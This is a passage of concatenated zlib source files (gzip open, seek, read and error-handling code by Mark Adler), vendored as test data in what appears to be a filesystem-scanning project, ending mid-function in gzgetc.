internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/examples/zran.h ================================================ /* zran.h -- example of deflated stream indexing and random access * Copyright (C) 2005, 2012, 2018, 2023 Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h * Version 1.3 18 Feb 2023 Mark Adler */ #include #include "zlib.h" // Access point. typedef struct point { off_t out; // offset in uncompressed data off_t in; // offset in compressed file of first full byte int bits; // 0, or number of bits (1-7) from byte at in-1 unsigned char window[32768]; // preceding 32K of uncompressed data } point_t; // Access point list. struct deflate_index { int have; // number of access points in list int mode; // -15 for raw, 15 for zlib, or 31 for gzip off_t length; // total length of uncompressed data point_t *list; // allocated list of access points }; // Make one pass through a zlib, gzip, or raw deflate compressed stream and // build an index, with access points about every span bytes of uncompressed // output. gzip files with multiple members are fully indexed. span should be // chosen to balance the speed of random access against the memory requirements // of the list, which is about 32K bytes per access point. The return value is // the number of access points on success (>= 1), Z_MEM_ERROR for out of // memory, Z_BUF_ERROR for a premature end of input, Z_DATA_ERROR for a format // or verification error in the input file, or Z_ERRNO for a file read error. // On success, *built points to the resulting index. int deflate_index_build(FILE *in, off_t span, struct deflate_index **built); // Use the index to read len bytes from offset into buf. Return the number of // bytes read or a negative error code. If data is requested past the end of // the uncompressed data, then deflate_index_extract() will return a value less // than len, indicating how much was actually read into buf. If given a valid // index, this function should not return an error unless the file was modified // somehow since the index was generated, given that deflate_index_build() had // validated all of the input. If nevertheless there is a failure, Z_BUF_ERROR // is returned if the compressed data ends prematurely, Z_DATA_ERROR if the // deflate compressed data is not valid, Z_MEM_ERROR if out of memory, // Z_STREAM_ERROR if the index is not valid, or Z_ERRNO if there is an error // reading or seeking on the input file. ptrdiff_t deflate_index_extract(FILE *in, struct deflate_index *index, off_t offset, unsigned char *buf, size_t len); // Deallocate an index built by deflate_index_build(). void deflate_index_free(struct deflate_index *index); ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/gzclose.c ================================================ /* gzclose.c -- zlib gzclose() function * Copyright (C) 2004, 2010 Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ #include "gzguts.h" /* gzclose() is in a separate file so that it is linked in only if it is used. That way the other gzclose functions can be used instead to avoid linking in unneeded compression or decompression routines. */ int ZEXPORT gzclose(gzFile file) { #ifndef NO_GZCOMPRESS gz_statep state; if (file == NULL) return Z_STREAM_ERROR; state = (gz_statep)file; return state->mode == GZ_READ ? gzclose_r(file) : gzclose_w(file); #else return gzclose_r(file); #endif } ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/gzguts.h ================================================ /* gzguts.h -- zlib internal header definitions for gz* operations * Copyright (C) 2004-2019 Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ #ifdef _LARGEFILE64_SOURCE # ifndef _LARGEFILE_SOURCE # define _LARGEFILE_SOURCE 1 # endif # undef _FILE_OFFSET_BITS # undef _TIME_BITS #endif #ifdef HAVE_HIDDEN # define ZLIB_INTERNAL __attribute__((visibility ("hidden"))) #else # define ZLIB_INTERNAL #endif #include #include "zlib.h" #ifdef STDC # include # include # include #endif #ifndef _POSIX_SOURCE # define _POSIX_SOURCE #endif #include #ifdef _WIN32 # include #endif #if defined(__TURBOC__) || defined(_MSC_VER) || defined(_WIN32) # include #endif #if defined(_WIN32) # define WIDECHAR #endif #ifdef WINAPI_FAMILY # define open _open # define read _read # define write _write # define close _close #endif #ifdef NO_DEFLATE /* for compatibility with old definition */ # define NO_GZCOMPRESS #endif #if defined(STDC99) || (defined(__TURBOC__) && __TURBOC__ >= 0x550) # ifndef HAVE_VSNPRINTF # define HAVE_VSNPRINTF # endif #endif #if defined(__CYGWIN__) # ifndef HAVE_VSNPRINTF # define HAVE_VSNPRINTF # endif #endif #if defined(MSDOS) && defined(__BORLANDC__) && (BORLANDC > 0x410) # ifndef HAVE_VSNPRINTF # define HAVE_VSNPRINTF # endif #endif #ifndef HAVE_VSNPRINTF # ifdef MSDOS /* vsnprintf may exist on some MS-DOS compilers (DJGPP?), but for now we just assume it doesn't. */ # define NO_vsnprintf # endif # ifdef __TURBOC__ # define NO_vsnprintf # endif # ifdef WIN32 /* In Win32, vsnprintf is available as the "non-ANSI" _vsnprintf. */ # if !defined(vsnprintf) && !defined(NO_vsnprintf) # if !defined(_MSC_VER) || ( defined(_MSC_VER) && _MSC_VER < 1500 ) # define vsnprintf _vsnprintf # endif # endif # endif # ifdef __SASC # define NO_vsnprintf # endif # ifdef VMS # define NO_vsnprintf # endif # ifdef __OS400__ # define NO_vsnprintf # endif # ifdef __MVS__ # define NO_vsnprintf # endif #endif /* unlike snprintf (which is required in C99), _snprintf does not guarantee null termination of the result -- however this is only used in gzlib.c where the result is assured to fit in the space provided */ #if defined(_MSC_VER) && _MSC_VER < 1900 # define snprintf _snprintf #endif #ifndef local # define local static #endif /* since "static" is used to mean two completely different things in C, we define "local" for the non-static meaning of "static", for readability (compile with -Dlocal if your debugger can't find static symbols) */ /* gz* functions always use library allocation functions */ #ifndef STDC extern voidp malloc(uInt size); extern void free(voidpf ptr); #endif /* get errno and strerror definition */ #if defined UNDER_CE # include # define zstrerror() gz_strwinerror((DWORD)GetLastError()) #else # ifndef NO_STRERROR # include # define zstrerror() strerror(errno) # else # define zstrerror() "stdio error (consult errno)" # endif #endif /* provide prototypes for these when building zlib without LFS */ #if !defined(_LARGEFILE64_SOURCE) || _LFS64_LARGEFILE-0 == 0 ZEXTERN gzFile ZEXPORT gzopen64(const char *, const char *); ZEXTERN z_off64_t ZEXPORT gzseek64(gzFile, z_off64_t, int); ZEXTERN z_off64_t ZEXPORT gztell64(gzFile); ZEXTERN z_off64_t ZEXPORT gzoffset64(gzFile); #endif /* default memLevel */ #if MAX_MEM_LEVEL >= 8 # define DEF_MEM_LEVEL 8 #else # define DEF_MEM_LEVEL MAX_MEM_LEVEL #endif /* default i/o buffer size -- double this for output when reading (this and twice this must be able to fit in an unsigned type) */ #define GZBUFSIZE 8192 /* gzip modes, also provide a little integrity check on the passed structure */ #define GZ_NONE 0 #define GZ_READ 7247 #define GZ_WRITE 31153 #define GZ_APPEND 1 /* mode set to GZ_WRITE after the file is opened */ /* values for gz_state how */ #define LOOK 0 /* look for a gzip header */ #define COPY 1 /* copy input directly */ #define GZIP 2 /* decompress a gzip stream */ /* internal gzip file state data structure */ typedef struct { /* exposed contents for gzgetc() macro */ struct gzFile_s x; /* "x" for exposed */ /* x.have: number of bytes available at x.next */ /* x.next: next output data to deliver or write */ /* x.pos: current position in uncompressed data */ /* used for both reading and writing */ int mode; /* see gzip modes above */ int fd; /* file descriptor */ char *path; /* path or fd for error messages */ unsigned size; /* buffer size, zero if not allocated yet */ unsigned want; /* requested buffer size, default is GZBUFSIZE */ unsigned char *in; /* input buffer (double-sized when writing) */ unsigned char *out; /* output buffer (double-sized when reading) */ int direct; /* 0 if processing gzip, 1 if transparent */ /* just for reading */ int how; /* 0: get header, 1: copy, 2: decompress */ z_off64_t start; /* where the gzip data started, for rewinding */ int eof; /* true if end of input file reached */ int past; /* true if read requested past end */ /* just for writing */ int level; /* compression level */ int strategy; /* compression strategy */ int reset; /* true if a reset is pending after a Z_FINISH */ /* seek request */ z_off64_t skip; /* amount to skip (already rewound if backwards) */ int seek; /* true if seek request pending */ /* error information */ int err; /* error code */ char *msg; /* error message */ /* zlib inflate or deflate stream */ z_stream strm; /* stream structure in-place (not a pointer) */ } gz_state; typedef gz_state FAR *gz_statep; /* shared functions */ void ZLIB_INTERNAL gz_error(gz_statep, int, const char *); #if defined UNDER_CE char ZLIB_INTERNAL *gz_strwinerror(DWORD error); #endif /* GT_OFF(x), where x is an unsigned value, is true if x > maximum z_off64_t value -- needed when comparing unsigned to z_off64_t, which is signed (possible z_off64_t types off_t, off64_t, and long are all signed) */ #ifdef INT_MAX # define GT_OFF(x) (sizeof(int) == sizeof(z_off64_t) && (x) > INT_MAX) #else unsigned ZLIB_INTERNAL gz_intmax(void); # define GT_OFF(x) (sizeof(int) == sizeof(z_off64_t) && (x) > gz_intmax()) #endif ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/gzlib.c ================================================ /* gzlib.c -- zlib functions common to reading and writing gzip files * Copyright (C) 2004-2019 Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ #include "gzguts.h" #if defined(_WIN32) && !defined(__BORLANDC__) # define LSEEK _lseeki64 #else #if defined(_LARGEFILE64_SOURCE) && _LFS64_LARGEFILE-0 # define LSEEK lseek64 #else # define LSEEK lseek #endif #endif #if defined UNDER_CE /* Map the Windows error number in ERROR to a locale-dependent error message string and return a pointer to it. Typically, the values for ERROR come from GetLastError. The string pointed to shall not be modified by the application, but may be overwritten by a subsequent call to gz_strwinerror The gz_strwinerror function does not change the current setting of GetLastError. */ char ZLIB_INTERNAL *gz_strwinerror(DWORD error) { static char buf[1024]; wchar_t *msgbuf; DWORD lasterr = GetLastError(); DWORD chars = FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_ALLOCATE_BUFFER, NULL, error, 0, /* Default language */ (LPVOID)&msgbuf, 0, NULL); if (chars != 0) { /* If there is an \r\n appended, zap it. */ if (chars >= 2 && msgbuf[chars - 2] == '\r' && msgbuf[chars - 1] == '\n') { chars -= 2; msgbuf[chars] = 0; } if (chars > sizeof (buf) - 1) { chars = sizeof (buf) - 1; msgbuf[chars] = 0; } wcstombs(buf, msgbuf, chars + 1); LocalFree(msgbuf); } else { sprintf(buf, "unknown win32 error (%ld)", error); } SetLastError(lasterr); return buf; } #endif /* UNDER_CE */ /* Reset gzip file state */ local void gz_reset(gz_statep state) { state->x.have = 0; /* no output data available */ if (state->mode == GZ_READ) { /* for reading ... */ state->eof = 0; /* not at end of file */ state->past = 0; /* have not read past end yet */ state->how = LOOK; /* look for gzip header */ } else /* for writing ... */ state->reset = 0; /* no deflateReset pending */ state->seek = 0; /* no seek request pending */ gz_error(state, Z_OK, NULL); /* clear error */ state->x.pos = 0; /* no uncompressed data yet */ state->strm.avail_in = 0; /* no input data yet */ } /* Open a gzip file either by name or file descriptor. */ local gzFile gz_open(const void *path, int fd, const char *mode) { gz_statep state; z_size_t len; int oflag; #ifdef O_CLOEXEC int cloexec = 0; #endif #ifdef O_EXCL int exclusive = 0; #endif /* check input */ if (path == NULL) return NULL; /* allocate gzFile structure to return */ state = (gz_statep)malloc(sizeof(gz_state)); if (state == NULL) return NULL; state->size = 0; /* no buffers allocated yet */ state->want = GZBUFSIZE; /* requested buffer size */ state->msg = NULL; /* no error message yet */ /* interpret mode */ state->mode = GZ_NONE; state->level = Z_DEFAULT_COMPRESSION; state->strategy = Z_DEFAULT_STRATEGY; state->direct = 0; while (*mode) { if (*mode >= '0' && *mode <= '9') state->level = *mode - '0'; else switch (*mode) { case 'r': state->mode = GZ_READ; break; #ifndef NO_GZCOMPRESS case 'w': state->mode = GZ_WRITE; break; case 'a': state->mode = GZ_APPEND; break; #endif case '+': /* can't read and write at the same time */ free(state); return NULL; case 'b': /* ignore -- will request binary anyway */ break; #ifdef O_CLOEXEC case 'e': cloexec = 1; break; #endif #ifdef O_EXCL case 'x': exclusive = 1; break; #endif case 'f': state->strategy = Z_FILTERED; break; case 'h': state->strategy = Z_HUFFMAN_ONLY; break; case 'R': state->strategy = Z_RLE; break; case 'F': state->strategy = Z_FIXED; break; case 'T': state->direct = 1; break; default: /* could consider as an error, but just ignore */ ; } mode++; } /* must provide an "r", "w", or "a" */ if (state->mode == GZ_NONE) { free(state); return NULL; } /* can't force transparent read */ if (state->mode == GZ_READ) { if (state->direct) { free(state); return NULL; } state->direct = 1; /* for empty file */ } /* save the path name for error messages */ #ifdef WIDECHAR if (fd == -2) { len = wcstombs(NULL, path, 0); if (len == (z_size_t)-1) len = 0; } else #endif len = strlen((const char *)path); state->path = (char *)malloc(len + 1); if (state->path == NULL) { free(state); return NULL; } #ifdef WIDECHAR if (fd == -2) if (len) wcstombs(state->path, path, len + 1); else *(state->path) = 0; else #endif #if !defined(NO_snprintf) && !defined(NO_vsnprintf) (void)snprintf(state->path, len + 1, "%s", (const char *)path); #else strcpy(state->path, path); #endif /* compute the flags for open() */ oflag = #ifdef O_LARGEFILE O_LARGEFILE | #endif #ifdef O_BINARY O_BINARY | #endif #ifdef O_CLOEXEC (cloexec ? O_CLOEXEC : 0) | #endif (state->mode == GZ_READ ? O_RDONLY : (O_WRONLY | O_CREAT | #ifdef O_EXCL (exclusive ? O_EXCL : 0) | #endif (state->mode == GZ_WRITE ? O_TRUNC : O_APPEND))); /* open the file with the appropriate flags (or just use fd) */ state->fd = fd > -1 ? fd : ( #ifdef WIDECHAR fd == -2 ? _wopen(path, oflag, 0666) : #endif open((const char *)path, oflag, 0666)); if (state->fd == -1) { free(state->path); free(state); return NULL; } if (state->mode == GZ_APPEND) { LSEEK(state->fd, 0, SEEK_END); /* so gzoffset() is correct */ state->mode = GZ_WRITE; /* simplify later checks */ } /* save the current position for rewinding (only if reading) */ if (state->mode == GZ_READ) { state->start = LSEEK(state->fd, 0, SEEK_CUR); if (state->start == -1) state->start = 0; } /* initialize stream */ gz_reset(state); /* return stream */ return (gzFile)state; } /* -- see zlib.h -- */ gzFile ZEXPORT gzopen(const char *path, const char *mode) { return gz_open(path, -1, mode); } /* -- see zlib.h -- */ gzFile ZEXPORT gzopen64(const char *path, const char *mode) { return gz_open(path, -1, mode); } /* -- see zlib.h -- */ gzFile ZEXPORT gzdopen(int fd, const char *mode) { char *path; /* identifier for error messages */ gzFile gz; if (fd == -1 || (path = (char *)malloc(7 + 3 * sizeof(int))) == NULL) return NULL; #if !defined(NO_snprintf) && !defined(NO_vsnprintf) (void)snprintf(path, 7 + 3 * sizeof(int), "", fd); #else sprintf(path, "", fd); /* for debugging */ #endif gz = gz_open(path, fd, mode); free(path); return gz; } /* -- see zlib.h -- */ #ifdef WIDECHAR gzFile ZEXPORT gzopen_w(const wchar_t *path, const char *mode) { return gz_open(path, -2, mode); } #endif /* -- see zlib.h -- */ int ZEXPORT gzbuffer(gzFile file, unsigned size) { gz_statep state; /* get internal structure and check integrity */ if (file == NULL) return -1; state = (gz_statep)file; if (state->mode != GZ_READ && state->mode != GZ_WRITE) return -1; /* make sure we haven't already allocated memory */ if (state->size != 0) return -1; /* check and set requested size */ if ((size << 1) < size) return -1; /* need to be able to double it */ if (size < 8) size = 8; /* needed to behave well with flushing */ state->want = size; return 0; } /* -- see zlib.h -- */ int ZEXPORT gzrewind(gzFile file) { gz_statep state; /* get internal structure */ if (file == NULL) return -1; state = (gz_statep)file; /* check that we're reading and that there's no error */ if (state->mode != GZ_READ || (state->err != Z_OK && state->err != Z_BUF_ERROR)) return -1; /* back up and start over */ if (LSEEK(state->fd, state->start, SEEK_SET) == -1) return -1; gz_reset(state); return 0; } /* -- see zlib.h -- */ z_off64_t ZEXPORT gzseek64(gzFile file, z_off64_t offset, int whence) { unsigned n; z_off64_t ret; gz_statep state; /* get internal structure and check integrity */ if (file == NULL) return -1; state = (gz_statep)file; if (state->mode != GZ_READ && state->mode != GZ_WRITE) return -1; /* check that there's no error */ if (state->err != Z_OK && state->err != Z_BUF_ERROR) return -1; /* can only seek from start or relative to current position */ if (whence != SEEK_SET && whence != SEEK_CUR) return -1; /* normalize offset to a SEEK_CUR specification */ if (whence == SEEK_SET) offset -= state->x.pos; else if (state->seek) offset += state->skip; state->seek = 0; /* if within raw area while reading, just go there */ if (state->mode == GZ_READ && state->how == COPY && state->x.pos + offset >= 0) { ret = LSEEK(state->fd, offset - (z_off64_t)state->x.have, SEEK_CUR); if (ret == -1) return -1; state->x.have = 0; state->eof = 0; state->past = 0; state->seek = 0; gz_error(state, Z_OK, NULL); state->strm.avail_in = 0; state->x.pos += offset; return state->x.pos; } /* calculate skip amount, rewinding if needed for back seek when reading */ if (offset < 0) { if (state->mode != GZ_READ) /* writing -- can't go backwards */ return -1; offset += state->x.pos; if (offset < 0) /* before start of file! */ return -1; if (gzrewind(file) == -1) /* rewind, then skip to offset */ return -1; } /* if reading, skip what's in output buffer (one less gzgetc() check) */ if (state->mode == GZ_READ) { n = GT_OFF(state->x.have) || (z_off64_t)state->x.have > offset ? (unsigned)offset : state->x.have; state->x.have -= n; state->x.next += n; state->x.pos += n; offset -= n; } /* request skip (if not zero) */ if (offset) { state->seek = 1; state->skip = offset; } return state->x.pos + offset; } /* -- see zlib.h -- */ z_off_t ZEXPORT gzseek(gzFile file, z_off_t offset, int whence) { z_off64_t ret; ret = gzseek64(file, (z_off64_t)offset, whence); return ret == (z_off_t)ret ? (z_off_t)ret : -1; } /* -- see zlib.h -- */ z_off64_t ZEXPORT gztell64(gzFile file) { gz_statep state; /* get internal structure and check integrity */ if (file == NULL) return -1; state = (gz_statep)file; if (state->mode != GZ_READ && state->mode != GZ_WRITE) return -1; /* return position */ return state->x.pos + (state->seek ? state->skip : 0); } /* -- see zlib.h -- */ z_off_t ZEXPORT gztell(gzFile file) { z_off64_t ret; ret = gztell64(file); return ret == (z_off_t)ret ? (z_off_t)ret : -1; } /* -- see zlib.h -- */ z_off64_t ZEXPORT gzoffset64(gzFile file) { z_off64_t offset; gz_statep state; /* get internal structure and check integrity */ if (file == NULL) return -1; state = (gz_statep)file; if (state->mode != GZ_READ && state->mode != GZ_WRITE) return -1; /* compute and return effective offset in file */ offset = LSEEK(state->fd, 0, SEEK_CUR); if (offset == -1) return -1; if (state->mode == GZ_READ) /* reading */ offset -= state->strm.avail_in; /* don't count buffered input */ return offset; } /* -- see zlib.h -- */ z_off_t ZEXPORT gzoffset(gzFile file) { z_off64_t ret; ret = gzoffset64(file); return ret == (z_off_t)ret ? (z_off_t)ret : -1; } /* -- see zlib.h -- */ int ZEXPORT gzeof(gzFile file) { gz_statep state; /* get internal structure and check integrity */ if (file == NULL) return 0; state = (gz_statep)file; if (state->mode != GZ_READ && state->mode != GZ_WRITE) return 0; /* return end-of-file state */ return state->mode == GZ_READ ? state->past : 0; } /* -- see zlib.h -- */ const char * ZEXPORT gzerror(gzFile file, int *errnum) { gz_statep state; /* get internal structure and check integrity */ if (file == NULL) return NULL; state = (gz_statep)file; if (state->mode != GZ_READ && state->mode != GZ_WRITE) return NULL; /* return error information */ if (errnum != NULL) *errnum = state->err; return state->err == Z_MEM_ERROR ? "out of memory" : (state->msg == NULL ? "" : state->msg); } /* -- see zlib.h -- */ void ZEXPORT gzclearerr(gzFile file) { gz_statep state; /* get internal structure and check integrity */ if (file == NULL) return; state = (gz_statep)file; if (state->mode != GZ_READ && state->mode != GZ_WRITE) return; /* clear error and end-of-file */ if (state->mode == GZ_READ) { state->eof = 0; state->past = 0; } gz_error(state, Z_OK, NULL); } /* Create an error message in allocated memory and set state->err and state->msg accordingly. Free any previous error message already there. Do not try to free or allocate space if the error is Z_MEM_ERROR (out of memory). Simply save the error message as a static string. If there is an allocation failure constructing the error message, then convert the error to out of memory. */ void ZLIB_INTERNAL gz_error(gz_statep state, int err, const char *msg) { /* free previously allocated message and clear */ if (state->msg != NULL) { if (state->err != Z_MEM_ERROR) free(state->msg); state->msg = NULL; } /* if fatal, set state->x.have to 0 so that the gzgetc() macro fails */ if (err != Z_OK && err != Z_BUF_ERROR) state->x.have = 0; /* set error code, and if no message, then done */ state->err = err; if (msg == NULL) return; /* for an out of memory error, return literal string when requested */ if (err == Z_MEM_ERROR) return; /* construct error message with path */ if ((state->msg = (char *)malloc(strlen(state->path) + strlen(msg) + 3)) == NULL) { state->err = Z_MEM_ERROR; return; } #if !defined(NO_snprintf) && !defined(NO_vsnprintf) (void)snprintf(state->msg, strlen(state->path) + strlen(msg) + 3, "%s%s%s", state->path, ": ", msg); #else strcpy(state->msg, state->path); strcat(state->msg, ": "); strcat(state->msg, msg); #endif } #ifndef INT_MAX /* portably return maximum value for an int (when limits.h presumed not available) -- we need to do this to cover cases where 2's complement not used, since C standard permits 1's complement and sign-bit representations, otherwise we could just use ((unsigned)-1) >> 1 */ unsigned ZLIB_INTERNAL gz_intmax(void) { unsigned p, q; p = 1; do { q = p; p <<= 1; p++; } while (p > q); return q >> 1; } #endif ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/gzread.c ================================================ /* gzread.c -- zlib functions for reading gzip files * Copyright (C) 2004-2017 Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ #include "gzguts.h" /* Use read() to load a buffer -- return -1 on error, otherwise 0. Read from state->fd, and update state->eof, state->err, and state->msg as appropriate. This function needs to loop on read(), since read() is not guaranteed to read the number of bytes requested, depending on the type of descriptor. */ local int gz_load(gz_statep state, unsigned char *buf, unsigned len, unsigned *have) { int ret; unsigned get, max = ((unsigned)-1 >> 2) + 1; *have = 0; do { get = len - *have; if (get > max) get = max; ret = read(state->fd, buf + *have, get); if (ret <= 0) break; *have += (unsigned)ret; } while (*have < len); if (ret < 0) { gz_error(state, Z_ERRNO, zstrerror()); return -1; } if (ret == 0) state->eof = 1; return 0; } /* Load up input buffer and set eof flag if last data loaded -- return -1 on error, 0 otherwise. Note that the eof flag is set when the end of the input file is reached, even though there may be unused data in the buffer. Once that data has been used, no more attempts will be made to read the file. If strm->avail_in != 0, then the current data is moved to the beginning of the input buffer, and then the remainder of the buffer is loaded with the available data from the input file. */ local int gz_avail(gz_statep state) { unsigned got; z_streamp strm = &(state->strm); if (state->err != Z_OK && state->err != Z_BUF_ERROR) return -1; if (state->eof == 0) { if (strm->avail_in) { /* copy what's there to the start */ unsigned char *p = state->in; unsigned const char *q = strm->next_in; unsigned n = strm->avail_in; do { *p++ = *q++; } while (--n); } if (gz_load(state, state->in + strm->avail_in, state->size - strm->avail_in, &got) == -1) return -1; strm->avail_in += got; strm->next_in = state->in; } return 0; } /* Look for gzip header, set up for inflate or copy. state->x.have must be 0. If this is the first time in, allocate required memory. state->how will be left unchanged if there is no more input data available, will be set to COPY if there is no gzip header and direct copying will be performed, or it will be set to GZIP for decompression. If direct copying, then leftover input data from the input buffer will be copied to the output buffer. In that case, all further file reads will be directly to either the output buffer or a user buffer. If decompressing, the inflate state will be initialized. gz_look() will return 0 on success or -1 on failure. */ local int gz_look(gz_statep state) { z_streamp strm = &(state->strm); /* allocate read buffers and inflate memory */ if (state->size == 0) { /* allocate buffers */ state->in = (unsigned char *)malloc(state->want); state->out = (unsigned char *)malloc(state->want << 1); if (state->in == NULL || state->out == NULL) { free(state->out); free(state->in); gz_error(state, Z_MEM_ERROR, "out of memory"); return -1; } state->size = state->want; /* allocate inflate memory */ state->strm.zalloc = Z_NULL; state->strm.zfree = Z_NULL; state->strm.opaque = Z_NULL; state->strm.avail_in = 0; state->strm.next_in = Z_NULL; if (inflateInit2(&(state->strm), 15 + 16) != Z_OK) { /* gunzip */ free(state->out); free(state->in); state->size = 0; gz_error(state, Z_MEM_ERROR, "out of memory"); return -1; } } /* get at least the magic bytes in the input buffer */ if (strm->avail_in < 2) { if (gz_avail(state) == -1) return -1; if (strm->avail_in == 0) return 0; } /* look for gzip magic bytes -- if there, do gzip decoding (note: there is a logical dilemma here when considering the case of a partially written gzip file, to wit, if a single 31 byte is written, then we cannot tell whether this is a single-byte file, or just a partially written gzip file -- for here we assume that if a gzip file is being written, then the header will be written in a single operation, so that reading a single byte is sufficient indication that it is not a gzip file) */ if (strm->avail_in > 1 && strm->next_in[0] == 31 && strm->next_in[1] == 139) { inflateReset(strm); state->how = GZIP; state->direct = 0; return 0; } /* no gzip header -- if we were decoding gzip before, then this is trailing garbage. Ignore the trailing garbage and finish. */ if (state->direct == 0) { strm->avail_in = 0; state->eof = 1; state->x.have = 0; return 0; } /* doing raw i/o, copy any leftover input to output -- this assumes that the output buffer is larger than the input buffer, which also assures space for gzungetc() */ state->x.next = state->out; memcpy(state->x.next, strm->next_in, strm->avail_in); state->x.have = strm->avail_in; strm->avail_in = 0; state->how = COPY; state->direct = 1; return 0; } /* Decompress from input to the provided next_out and avail_out in the state. On return, state->x.have and state->x.next point to the just decompressed data. If the gzip stream completes, state->how is reset to LOOK to look for the next gzip stream or raw data, once state->x.have is depleted. Returns 0 on success, -1 on failure. */ local int gz_decomp(gz_statep state) { int ret = Z_OK; unsigned had; z_streamp strm = &(state->strm); /* fill output buffer up to end of deflate stream */ had = strm->avail_out; do { /* get more input for inflate() */ if (strm->avail_in == 0 && gz_avail(state) == -1) return -1; if (strm->avail_in == 0) { gz_error(state, Z_BUF_ERROR, "unexpected end of file"); break; } /* decompress and handle errors */ ret = inflate(strm, Z_NO_FLUSH); if (ret == Z_STREAM_ERROR || ret == Z_NEED_DICT) { gz_error(state, Z_STREAM_ERROR, "internal error: inflate stream corrupt"); return -1; } if (ret == Z_MEM_ERROR) { gz_error(state, Z_MEM_ERROR, "out of memory"); return -1; } if (ret == Z_DATA_ERROR) { /* deflate stream invalid */ gz_error(state, Z_DATA_ERROR, strm->msg == NULL ? "compressed data error" : strm->msg); return -1; } } while (strm->avail_out && ret != Z_STREAM_END); /* update available output */ state->x.have = had - strm->avail_out; state->x.next = strm->next_out - state->x.have; /* if the gzip stream completed successfully, look for another */ if (ret == Z_STREAM_END) state->how = LOOK; /* good decompression */ return 0; } /* Fetch data and put it in the output buffer. Assumes state->x.have is 0. Data is either copied from the input file or decompressed from the input file depending on state->how. If state->how is LOOK, then a gzip header is looked for to determine whether to copy or decompress. Returns -1 on error, otherwise 0. gz_fetch() will leave state->how as COPY or GZIP unless the end of the input file has been reached and all data has been processed. */ local int gz_fetch(gz_statep state) { z_streamp strm = &(state->strm); do { switch(state->how) { case LOOK: /* -> LOOK, COPY (only if never GZIP), or GZIP */ if (gz_look(state) == -1) return -1; if (state->how == LOOK) return 0; break; case COPY: /* -> COPY */ if (gz_load(state, state->out, state->size << 1, &(state->x.have)) == -1) return -1; state->x.next = state->out; return 0; case GZIP: /* -> GZIP or LOOK (if end of gzip stream) */ strm->avail_out = state->size << 1; strm->next_out = state->out; if (gz_decomp(state) == -1) return -1; } } while (state->x.have == 0 && (!state->eof || strm->avail_in)); return 0; } /* Skip len uncompressed bytes of output. Return -1 on error, 0 on success. */ local int gz_skip(gz_statep state, z_off64_t len) { unsigned n; /* skip over len bytes or reach end-of-file, whichever comes first */ while (len) /* skip over whatever is in output buffer */ if (state->x.have) { n = GT_OFF(state->x.have) || (z_off64_t)state->x.have > len ? (unsigned)len : state->x.have; state->x.have -= n; state->x.next += n; state->x.pos += n; len -= n; } /* output buffer empty -- return if we're at the end of the input */ else if (state->eof && state->strm.avail_in == 0) break; /* need more data to skip -- load up output buffer */ else { /* get more output, looking for header if required */ if (gz_fetch(state) == -1) return -1; } return 0; } /* Read len bytes into buf from file, or less than len up to the end of the input. Return the number of bytes read. If zero is returned, either the end of file was reached, or there was an error. state->err must be consulted in that case to determine which. */ local z_size_t gz_read(gz_statep state, voidp buf, z_size_t len) { z_size_t got; unsigned n; /* if len is zero, avoid unnecessary operations */ if (len == 0) return 0; /* process a skip request */ if (state->seek) { state->seek = 0; if (gz_skip(state, state->skip) == -1) return 0; } /* get len bytes to buf, or less than len if at the end */ got = 0; do { /* set n to the maximum amount of len that fits in an unsigned int */ n = (unsigned)-1; if (n > len) n = (unsigned)len; /* first just try copying data from the output buffer */ if (state->x.have) { if (state->x.have < n) n = state->x.have; memcpy(buf, state->x.next, n); state->x.next += n; state->x.have -= n; } /* output buffer empty -- return if we're at the end of the input */ else if (state->eof && state->strm.avail_in == 0) { state->past = 1; /* tried to read past end */ break; } /* need output data -- for small len or new stream load up our output buffer */ else if (state->how == LOOK || n < (state->size << 1)) { /* get more output, looking for header if required */ if (gz_fetch(state) == -1) return 0; continue; /* no progress yet -- go back to copy above */ /* the copy above assures that we will leave with space in the output buffer, allowing at least one gzungetc() to succeed */ } /* large len -- read directly into user buffer */ else if (state->how == COPY) { /* read directly */ if (gz_load(state, (unsigned char *)buf, n, &n) == -1) return 0; } /* large len -- decompress directly into user buffer */ else { /* state->how == GZIP */ state->strm.avail_out = n; state->strm.next_out = (unsigned char *)buf; if (gz_decomp(state) == -1) return 0; n = state->x.have; state->x.have = 0; } /* update progress */ len -= n; buf = (char *)buf + n; got += n; state->x.pos += n; } while (len); /* return number of bytes read into user buffer */ return got; } /* -- see zlib.h -- */ int ZEXPORT gzread(gzFile file, voidp buf, unsigned len) { gz_statep state; /* get internal structure */ if (file == NULL) return -1; state = (gz_statep)file; /* check that we're reading and that there's no (serious) error */ if (state->mode != GZ_READ || (state->err != Z_OK && state->err != Z_BUF_ERROR)) return -1; /* since an int is returned, make sure len fits in one, otherwise return with an error (this avoids a flaw in the interface) */ if ((int)len < 0) { gz_error(state, Z_STREAM_ERROR, "request does not fit in an int"); return -1; } /* read len or fewer bytes to buf */ len = (unsigned)gz_read(state, buf, len); /* check for an error */ if (len == 0 && state->err != Z_OK && state->err != Z_BUF_ERROR) return -1; /* return the number of bytes read (this is assured to fit in an int) */ return (int)len; } /* -- see zlib.h -- */ z_size_t ZEXPORT gzfread(voidp buf, z_size_t size, z_size_t nitems, gzFile file) { z_size_t len; gz_statep state; /* get internal structure */ if (file == NULL) return 0; state = (gz_statep)file; /* check that we're reading and that there's no (serious) error */ if (state->mode != GZ_READ || (state->err != Z_OK && state->err != Z_BUF_ERROR)) return 0; /* compute bytes to read -- error on overflow */ len = nitems * size; if (size && len / size != nitems) { gz_error(state, Z_STREAM_ERROR, "request does not fit in a size_t"); return 0; } /* read len or fewer bytes to buf, return the number of full items read */ return len ? gz_read(state, buf, len) / size : 0; } /* -- see zlib.h -- */ #ifdef Z_PREFIX_SET # undef z_gzgetc #else # undef gzgetc #endif int ZEXPORT gzgetc(gzFile file) { unsigned char buf[1]; gz_statep state; /* get internal structure */ if (file == NULL) return -1; state = (gz_statep)file; /* check that we're reading and that there's no 